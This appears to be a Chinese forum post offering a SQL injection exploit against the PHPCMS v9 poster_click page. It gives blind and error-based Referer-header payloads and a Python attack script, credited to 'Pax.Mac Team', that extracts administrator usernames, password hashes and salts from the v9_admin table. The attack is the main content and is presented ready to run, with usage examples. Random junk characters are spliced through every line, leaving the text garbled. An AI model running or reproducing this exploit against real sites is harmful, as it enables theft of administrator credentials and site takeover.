9 |6 f# F# T4 v" \% o6 A1 r1、可以采用盲注入的手法: ; p" ]7 X# }6 v! n 6 T7 ?% u! Y/ u8 Wreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#, E% c% Z2 P. S5 ~ n
9 k9 B, `7 I0 ^' H
通过返回页面,正常与否一个个猜解密码字段。* ]! _' u' a$ _( d
. _/ J9 l! Q6 }3 E! h A
2、代码是花开写的,随手附上了:4 L- d1 y$ Q% p+ J3 G3 W
) a( e b- `; o: |9 Z4 V2 k
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)# 5 F. Z D; ~: u- B5 o/ c5 u2 X5 x# J# q! _, c- p1 P1 W5 h6 U/ P# x7 F' p
此方法是爆错注入手法,原理自查。) q5 Z* W2 }8 _
+ M$ i. A X B/ t
- W0 U, k2 G( C/ B# H
' w# _0 _# j; v' |) J利用程序:9 k9 m/ q, a$ ?1 b
& d" Q4 u7 b: x3 T2 B8 P
#!/usr/bin/env python" z3 |) s. M9 s- m) ^
import httplib,sys,re ) l% X; f- k ~: c5 _& J8 e) D0 R% {' v% r+ ?. j! d6 T
def attack(): ; E0 @0 R$ e* B# ]& S0 b) Gprint “Code by Pax.Mac Team conqu3r!”2 y6 D' u0 f/ t6 p* C! Z: o2 a
print “Welcome to our zone!!!” 4 a5 H9 h% u4 A- r3 M; s I+ yurl=sys.argv[1]$ P- I9 a q* j# I( B
paths=sys.argv[2] ) y. Y2 d5 P1 a4 u! Kconn = httplib.HTTPConnection(url) / O% T+ d' d3 L! Li_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,; \8 N8 I. K- o2 ^& `
“Accept”: “text/plain”, . \# I" }- c+ Y5 X6 v* K“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”} 2 \9 }% T" A- l6 W. Lconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers) - H9 j0 q: t0 q& `. Wr1 = conn.getresponse() 1 N( ~6 y: Z, Y* _$ [- E3 adatas=r1.read() 3 a! o5 t/ m* s3 D7 p+ ndatas=re.findall(r”Duplicate entry \’\w+’”, datas)1 P. I9 W Y M3 G. B* \
print datas[0] * H2 q( Y2 @+ g# fconn.close(); @ \% z" I* b5 e
if __name__==”__main__”:* g& G, P! `7 Z/ O L# ?7 b
if len(sys.argv)<3:7 O- M$ R/ M/ |- @6 A' Y8 u* w
print “Code by Pax.Mac Team conqu3r”6 s- J) M8 C& |. O! f; N9 Q0 Q
print “Usgae:” ; b% H% W3 x& ^! C$ `" q* r3 vprint “ phpcmsattack.py www.paxmac.org /” " W) X1 j2 W* m! y1 _3 Kprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/” d; o1 C: T$ k5 z% ]4 isys.exit(1) $ H) T4 M2 s: d$ m' D. h) tattack()6 c2 Q1 q+ D' E
+ w3 o" e' e/ j7 A l" C